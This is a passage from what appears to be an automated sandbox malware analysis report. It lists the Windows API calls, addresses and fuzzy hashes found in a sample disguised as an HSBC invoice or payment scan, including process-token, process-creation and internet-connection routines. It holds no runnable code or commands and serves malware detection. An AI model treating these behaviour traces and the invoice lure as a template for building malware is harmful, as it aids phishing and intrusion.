                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00ED8BEB
                    • _memcmp.LIBCMT ref: 00ED8C0E
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00ED8C44
                    • HeapFree.KERNEL32(00000000), ref: 00ED8C4B
                    Similarity
                    • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                    • String ID:
                    • API String ID: 2182266621-0
                    • Opcode ID: b471b8b97d32d53bc1c772e17603f7f7d4e797ed5ad3c2e1c48ef68ac1641998
                    • Instruction ID: fa9730d303b23209efdf6aad57a81b930db039ede498186dfbecb64c8cb3d82d
                    • Opcode Fuzzy Hash: b471b8b97d32d53bc1c772e17603f7f7d4e797ed5ad3c2e1c48ef68ac1641998
                    • Instruction Fuzzy Hash: 9C218971E11208EBDB10CFA4CA48BEEB7B8EF54354F04409AE454AB240EB31AA06DB61
                    APIs
                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EF1A97
                      • Part of subcall function 00EF1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EF1B40
                      • Part of subcall function 00EF1B21: InternetCloseHandle.WININET(00000000), ref: 00EF1BDD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Internet$CloseConnectHandleOpen
                    • String ID:
                    • API String ID: 1463438336-0
                    • Opcode ID: 81a6ec6cd7e82728ed8b66877abca4045116ccc916e92e583365ef1b5d08de32
                    • Instruction ID: 5fd95e0f9e123b57695847eeb8815fc78332a569e461ba3e3b7f284a36873b6f
                    • Opcode Fuzzy Hash: 81a6ec6cd7e82728ed8b66877abca4045116ccc916e92e583365ef1b5d08de32
                    • Instruction Fuzzy Hash: 69219F35200A0DFFDB229F608C01FBAB7A9FF84701F10105EFB11A6651EB719815ABA1
                    APIs
                      • Part of subcall function 00EDF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00EDE1C4,?,?,?,00EDEFB7,00000000,000000EF,00000119,?,?), ref: 00EDF5BC
                      • Part of subcall function 00EDF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00EDF5E2
                      • Part of subcall function 00EDF5AD: lstrcmpiW.KERNEL32(00000000,?,00EDE1C4,?,?,?,00EDEFB7,00000000,000000EF,00000119,?,?), ref: 00EDF613
                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00EDEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00EDE1DD
                    • lstrcpyW.KERNEL32(00000000,?), ref: 00EDE203
                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00EDEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00EDE237
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: lstrcmpilstrcpylstrlen
                    • String ID: cdecl
                    • API String ID: 4031866154-3896280584
                    • Opcode ID: 531e903cadbb13a4f5dafc10eaf71ffcd0cf3abe3211bd5dc993e007176f200e
                    • Instruction ID: 0a9784b71f555509e9d5bf7d1e1053fc0e4a3db01f02fae9fd7259c867531553
                    • Opcode Fuzzy Hash: 531e903cadbb13a4f5dafc10eaf71ffcd0cf3abe3211bd5dc993e007176f200e
                    • Instruction Fuzzy Hash: A3118136200345EFCB25AF64DC4997A77B8FF49354B40502BF816DB360EB71A85297A0
                    APIs
                    • _free.LIBCMT ref: 00EB5351
                      • Part of subcall function 00EA594C: __FF_MSGBANNER.LIBCMT ref: 00EA5963
                      • Part of subcall function 00EA594C: __NMSG_WRITE.LIBCMT ref: 00EA596A
                      • Part of subcall function 00EA594C: RtlAllocateHeap.NTDLL(011A0000,00000000,00000001), ref: 00EA598F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AllocateHeap_free
                    • String ID:
                    • API String ID: 614378929-0
                    • Opcode ID: a900ec1250b1258bf4754ca65f72d828a4674a6bff759937ad9fb6d44bd09585
                    • Instruction ID: 4e60240ed5239a1931f22d4cfcc3926e54f2fb67b2be65d121e45a594b57503a
                    • Opcode Fuzzy Hash: a900ec1250b1258bf4754ca65f72d828a4674a6bff759937ad9fb6d44bd09585
                    • Instruction Fuzzy Hash: 1111A733904A15AFCB312F74AC457DF37D86F1A3B4B20242AFA45BE291DFB5A9409790
                    APIs
                    • _memset.LIBCMT ref: 00E84560
                      • Part of subcall function 00E8410D: _memset.LIBCMT ref: 00E8418D
                      • Part of subcall function 00E8410D: _wcscpy.LIBCMT ref: 00E841E1
                      • Part of subcall function 00E8410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E841F1
                    • KillTimer.USER32(?,00000001,?,?), ref: 00E845B5
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E845C4
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EBD6CE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                    • String ID:
                    • API String ID: 1378193009-0
                    • Opcode ID: cc52dd7cd0599d42539537559fba9ad8d6d918fdf285b97258a3db872fef6579
                    • Instruction ID: f803c777e958a5c75cd72d8bf9b2111a819b8bc15d8fc13c0b3b7aa029d8ef0b
                    • Opcode Fuzzy Hash: cc52dd7cd0599d42539537559fba9ad8d6d918fdf285b97258a3db872fef6579
                    • Instruction Fuzzy Hash: 4A21DDB0908744AFEB339B24DC45BEBBBECDF11308F04109EE69DA6185D7745A849B51
                    APIs
                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00ED8B2A
                    • OpenProcessToken.ADVAPI32(00000000), ref: 00ED8B31
                    • CloseHandle.KERNEL32(00000004), ref: 00ED8B4B
                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00ED8B7A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                    • String ID:
                    • API String ID: 2621361867-0
                    • Opcode ID: 9c9d09292e05cf6ca4de2af2df22a13eb8dc84a71035c6f6e2ef76015280f998
                    • Instruction ID: ad4c9a9aadc5ae8a0494ad93ccf1dd4a6073ecf9d2b675c7823d85bb5c8fdb0d
                    • Opcode Fuzzy Hash: 9c9d09292e05cf6ca4de2af2df22a13eb8dc84a71035c6f6e2ef76015280f998
                    • Instruction Fuzzy Hash: 76116AB650020DABDF118FA4EE49FDE7BA9FF08708F045066FE04A2160C7729D65EB61
                    APIs
                      • Part of subcall function 00E85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00EE7B20,?,?,00000000), ref: 00E85B8C
                      • Part of subcall function 00E85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00EE7B20,?,?,00000000,?,?), ref: 00E85BB0
                    • gethostbyname.WS2_32(?), ref: 00EF66AC
                    • WSAGetLastError.WS2_32(00000000), ref: 00EF66B7
                    • _memmove.LIBCMT ref: 00EF66E4
                    • inet_ntoa.WS2_32(?), ref: 00EF66EF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                    • String ID:
                    • API String ID: 1504782959-0
                    • Opcode ID: 9687d3b6d9279ff014f0a381a68601943be3ca39d69f58485081be562854faf1
                    • Instruction ID: d5f22b2553ea1d581e38e90b7d29c482d95ebbe00a8ab1159d9697cc10ec211d
                    • Opcode Fuzzy Hash: 9687d3b6d9279ff014f0a381a68601943be3ca39d69f58485081be562854faf1
                    • Instruction Fuzzy Hash: C6110A36900509ABCB04FBA4DD86DEEB7F8BF58310B145065F50AB71A2DF30AE04DB61
                    APIs
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00ED9043
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ED9055
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ED906B
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ED9086
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: f19b1983133d010d2832afb85f90c85e30ffd726bd577b53654478aa2ebd65ba
                    • Instruction ID: c142b6c7c5ea844939fce7221466bb97d98c21ce2fbb86ef7063f1c164533823
                    • Opcode Fuzzy Hash: f19b1983133d010d2832afb85f90c85e30ffd726bd577b53654478aa2ebd65ba
                    • Instruction Fuzzy Hash: 5E115E79900218FFDB10DFA5CC84E9DBBB4FB48310F204096E904B7290D6726E11DB90
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00EE01FD,?,00EE1250,?,00008000), ref: 00EE166F
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00EE01FD,?,00EE1250,?,00008000), ref: 00EE1694
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00EE01FD,?,00EE1250,?,00008000), ref: 00EE169E
                    • Sleep.KERNEL32(?,?,?,?,?,?,?,00EE01FD,?,00EE1250,?,00008000), ref: 00EE16D1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CounterPerformanceQuerySleep
                    • String ID:
                    • API String ID: 2875609808-0
                    • Opcode ID: 61447c74a22b3e563941ea49928c5a8daef254f57e13b10f8376545193d712e0
                    • Instruction ID: 975ac6c50239a7cb2f2da9e8baefeaca263e9220018766cb9c759ee5ed75523f
                    • Opcode Fuzzy Hash: 61447c74a22b3e563941ea49928c5a8daef254f57e13b10f8376545193d712e0
                    • Instruction Fuzzy Hash: B9116131C0055ED7CF10AFA6D948AEEBF78FF09751F455099E941B6240CB3055A0DBD6
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction ID: c8ddb803551c503431d02664974b3fbdf66d69d9261d14d2f44d9447e9bc8ed9
                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction Fuzzy Hash: A901807205414ABBCF125E84CC018EE3F62BF99345F099515FE9868831D237C9B1AB81
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 00F0B59E
                    • ScreenToClient.USER32(?,?), ref: 00F0B5B6
                    • ScreenToClient.USER32(?,?), ref: 00F0B5DA
                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F0B5F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ClientRectScreen$InvalidateWindow
                    • String ID:
                    • API String ID: 357397906-0
                    • Opcode ID: d7cf58035992bbe17566143cffe994fdb8bbac003b5f71fc8686deafc0246b98
                    • Instruction ID: 238caa0db0aa26c3ac00f18011a016a5a71d980b0e87ea3491fb7ceace73d799
                    • Opcode Fuzzy Hash: d7cf58035992bbe17566143cffe994fdb8bbac003b5f71fc8686deafc0246b98
                    • Instruction Fuzzy Hash: CA1146B5D0020DEFDB51CF99C8449EEFBB9FB08311F104166E914E3620D735AA559F50
                    APIs
                    • _memset.LIBCMT ref: 00F0B8FE
                    • _memset.LIBCMT ref: 00F0B90D
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F47F20,00F47F64), ref: 00F0B93C
                    • CloseHandle.KERNEL32 ref: 00F0B94E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _memset$CloseCreateHandleProcess
                    • String ID:
                    • API String ID: 3277943733-0
                    • Opcode ID: 676197dc152c1c3d058b71441e7334ec09b2484964e2d0aff9abbfafa3ff00cb
                    • Instruction ID: 7b44dbe38d8cd852df88c63f64fd2c59d097946e1c2eb9a6b23c60136c2c9be6
                    • Opcode Fuzzy Hash: 676197dc152c1c3d058b71441e7334ec09b2484964e2d0aff9abbfafa3ff00cb
                    • Instruction Fuzzy Hash: C3F089B55443087BF6203771AC45F7B7A9CEB1A774F001420BF08D5292D7755D08A7E8
                    APIs
                    • RtlEnterCriticalSection.NTDLL(?), ref: 00EE6E88
                      • Part of subcall function 00EE794E: _memset.LIBCMT ref: 00EE7983
                    • _memmove.LIBCMT ref: 00EE6EAB
                    • _memset.LIBCMT ref: 00EE6EB8
                    • RtlLeaveCriticalSection.NTDLL(?), ref: 00EE6EC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CriticalSection_memset$EnterLeave_memmove
                    • String ID:
                    • API String ID: 48991266-0
                    • Opcode ID: 0fc89daafe9688ef86fe8b2305540cd3adabfec9b8138eb8ed9ce05e96c686b0
                    • Instruction ID: 13d513b36a52386e37c3e503ff8f7b76f3aa8ae6011097de08bb33e607ce022b
                    • Opcode Fuzzy Hash: 0fc89daafe9688ef86fe8b2305540cd3adabfec9b8138eb8ed9ce05e96c686b0
                    • Instruction Fuzzy Hash: A2F0543A100204ABCF116F55DC85A49BB69EF49320F048061FE086E217C731E951DBB4
                    APIs
                      • Part of subcall function 00E812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E8134D
                      • Part of subcall function 00E812F3: SelectObject.GDI32(?,00000000), ref: 00E8135C
                      • Part of subcall function 00E812F3: BeginPath.GDI32(?), ref: 00E81373
                      • Part of subcall function 00E812F3: SelectObject.GDI32(?,00000000), ref: 00E8139C
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F0C030
                    • LineTo.GDI32(00000000,?,?), ref: 00F0C03D
                    • EndPath.GDI32(00000000), ref: 00F0C04D
                    • StrokePath.GDI32(00000000), ref: 00F0C05B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                    • String ID:
                    • API String ID: 1539411459-0
                    • Opcode ID: 7dabf2c0a1f2978c7ae33ab4c999c2ad426deb47d617148d61a66eefa8cbc478
                    • Instruction ID: 01a9b11ef6dfb0652765e1215df6be5d6b7bcc10fb0a2a4171b3d20ac0e17389
                    • Opcode Fuzzy Hash: 7dabf2c0a1f2978c7ae33ab4c999c2ad426deb47d617148d61a66eefa8cbc478
                    • Instruction Fuzzy Hash: E9F0BE3100025DBBDB226F50AC09FCE3F98BF16320F048100FA11A14E287B50569FBD5
                    APIs
                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00EDA399
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EDA3AC
                    • GetCurrentThreadId.KERNEL32 ref: 00EDA3B3
                    • AttachThreadInput.USER32(00000000), ref: 00EDA3BA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                    • String ID:
                    • API String ID: 2710830443-0
                    APIs
                    • GetSysColor.USER32(00000008), ref: 00E82231
                    • SetTextColor.GDI32(?,000000FF), ref: 00E8223B
                    • SetBkMode.GDI32(?,00000001), ref: 00E82250
                    • GetStockObject.GDI32(00000005), ref: 00E82258
                    • GetWindowDC.USER32(?,00000000), ref: 00EBC0D3
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EBC0E0
                    • GetPixel.GDI32(00000000,?,00000000), ref: 00EBC0F9
                    • GetPixel.GDI32(00000000,00000000,?), ref: 00EBC112
                    • GetPixel.GDI32(00000000,?,?), ref: 00EBC132
                    • ReleaseDC.USER32(?,00000000), ref: 00EBC13D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    Similarity
                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                    • String ID:
                    • API String ID: 1946975507-0
                    APIs
                    • GetCurrentThread.KERNEL32 ref: 00ED8C63
                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00ED882E), ref: 00ED8C6A
                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00ED882E), ref: 00ED8C77
                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00ED882E), ref: 00ED8C7E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    Similarity
